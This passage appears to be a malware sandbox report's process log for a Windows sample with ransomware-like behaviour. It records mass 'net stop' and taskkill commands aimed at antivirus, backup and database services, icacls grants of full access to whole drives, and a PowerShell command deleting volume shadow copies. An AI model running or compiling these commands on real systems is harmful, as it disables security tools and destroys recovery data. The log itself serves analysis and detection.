C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
3⤵
PID:7736

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
2⤵
PID:4268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
3⤵
PID:7964

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:4980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:11180

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
2⤵
PID:9748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
3⤵
PID:14592

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
2⤵
PID:10044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
3⤵
PID:14988

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
2⤵
PID:10184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
3⤵
PID:14868

C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
2⤵
PID:10176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
3⤵
PID:14860

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:10168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:14972

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
2⤵
PID:10160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
3⤵
PID:4964

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
2⤵
PID:10036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
3⤵
PID:4840

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
2⤵
PID:10028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
3⤵
PID:15344

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11976

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11964

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:12636

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:12628

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:12620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:12596

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12188

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11684

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11668

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11660

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11652

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11644

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11636

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11628

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11620

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11612

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11600

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11592

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11584

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11576

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11560

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11552

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11544

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11536

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11528

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11520

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11512

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11504

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11492

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11484

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11476

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:11468

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11460

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11452

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11436

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11420

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11412

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11404

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11396

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11388

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11380

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11372

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11360

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11352

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11344

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11336

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11328

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10732

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10720

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10704

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10664

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
2⤵
PID:10632

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:10624

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
2⤵
PID:10616

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
2⤵
PID:10608

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
2⤵
PID:8976

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
2⤵
PID:10016

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
2⤵
PID:10008

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
2⤵
PID:10000

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
2⤵
PID:9992

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
2⤵
PID:9984

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
2⤵
PID:9972

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
2⤵
PID:9956

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
2⤵
PID:9948

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
2⤵
PID:9940

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
2⤵
PID:9932

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
2⤵
PID:9924

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
2⤵
PID:9916

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:9908

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
2⤵
PID:9900

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
2⤵
PID:9888

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
2⤵
PID:7460

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
2⤵
PID:6612

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
2⤵
PID:6604

C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
2⤵
PID:6596

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
2⤵
PID:6580

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
2⤵
PID:6572

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
2⤵
PID:6564

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
2⤵
PID:6556

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
2⤵
PID:6548

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
2⤵
PID:6532

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
2⤵
PID:6524

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
2⤵
PID:6516

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
2⤵
PID:6508

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
2⤵
PID:6492

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
2⤵
PID:6484

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
2⤵
PID:6476

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
2⤵
PID:6464

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
2⤵
PID:6456

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
2⤵
PID:6448

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
2⤵
PID:6440

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
2⤵
PID:6432

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
2⤵
PID:6424

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
2⤵
PID:6416

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
2⤵
PID:6404

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
2⤵
PID:6388

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
2⤵
PID:6380

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
2⤵
PID:6372

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
2⤵
PID:6364

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
2⤵
PID:6356

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
2⤵
PID:6348

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
2⤵
PID:6340

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
2⤵
PID:6332

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
2⤵
PID:6316

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:6308

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
2⤵
PID:6300

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
2⤵
PID:6292

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
2⤵
PID:6276

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:6268

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
2⤵
PID:6260

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
2⤵
PID:6252

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:6244

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:6228

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
2⤵
PID:6220

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:6212

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
2⤵
PID:6204

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
2⤵
PID:6188

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
2⤵
PID:6180

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
2⤵
PID:6172

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
2⤵
PID:6156

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:6148

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
2⤵
PID:4544

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
2⤵
PID:4372

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
2⤵
PID:6136

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:6128

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
2⤵
PID:6112

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
2⤵
PID:6104

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
2⤵
PID:6096

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
2⤵
PID:6088

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
2⤵
PID:6080

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
2⤵
PID:6072

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
2⤵
PID:6064

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
2⤵
PID:6056

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:6048

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
2⤵
PID:6040

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
2⤵
PID:6028

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
2⤵
PID:6020

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
2⤵
PID:6012

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
2⤵
PID:6004

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
2⤵
PID:5988

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
2⤵
PID:5980

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
2⤵
PID:5972

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
2⤵
PID:5964

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
2⤵
PID:5956

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
2⤵
PID:5948

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
2⤵
PID:5940

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
2⤵
PID:5932

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
2⤵
PID:5908

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
2⤵
PID:5868

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
2⤵
PID:5860

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
2⤵
PID:5852

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
2⤵
PID:5836

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
2⤵
PID:5828

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
2⤵
PID:5820

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
2⤵
PID:5812

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
2⤵
PID:5804

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
2⤵
PID:5788

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:5780

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
2⤵
PID:5772

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
2⤵
PID:5764

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
2⤵
PID:5756

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
2⤵
PID:5748

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
2⤵
PID:5740

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
2⤵
PID:5732

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
2⤵
PID:5716

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
2⤵
PID:5708

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
2⤵
PID:5700

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
2⤵
PID:5692

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
2⤵
PID:5676

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
2⤵
PID:5668

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
2⤵
PID:5660

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
2⤵
PID:5644

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
2⤵
PID:5636

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
2⤵
PID:5628

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
2⤵
PID:5620

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
2⤵
PID:5612

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
2⤵
PID:5596

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
2⤵
PID:5588

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
2⤵
PID:5572

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
2⤵
PID:5564

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
2⤵
PID:5556

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:5548

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:5540

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:5528

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:5520

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:5512

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
2⤵
PID:5504

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:5496

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:5480

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:5472

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:5424

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
2⤵
PID:5416

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:5408

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:5400

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:5384

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
2⤵
PID:5376

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
2⤵
PID:5368

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
2⤵
PID:5360

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
2⤵
PID:5344

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
2⤵
PID:5336

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
2⤵
PID:5328

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
2⤵
PID:5320

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:5312

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
2⤵
PID:5304

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
2⤵
PID:5288

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
2⤵
PID:5280

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
2⤵
PID:5272

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
2⤵
PID:5264

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
2⤵
PID:5256

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
2⤵
PID:5248

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
2⤵
PID:5240

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
2⤵
PID:5232

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
2⤵
PID:5224

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
2⤵
PID:5216

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
2⤵
PID:5200

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
2⤵
PID:5192

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
2⤵
PID:5184

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:5176

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
2⤵
PID:5168

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
2⤵
PID:5160

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
2⤵
PID:5152

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
2⤵
PID:5144

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
2⤵
PID:5136

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
2⤵
PID:5128

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
2⤵
PID:4632

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
2⤵
PID:900

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
2⤵
PID:2260

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
2⤵
PID:3860

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
2⤵
PID:4892

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
2⤵
PID:4012

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
2⤵
PID:4700

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
2⤵
PID:2300

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
2⤵
PID:3540

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
2⤵
PID:5084

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
2⤵
PID:5100

C:\Windows\SysWOW64\net.exe
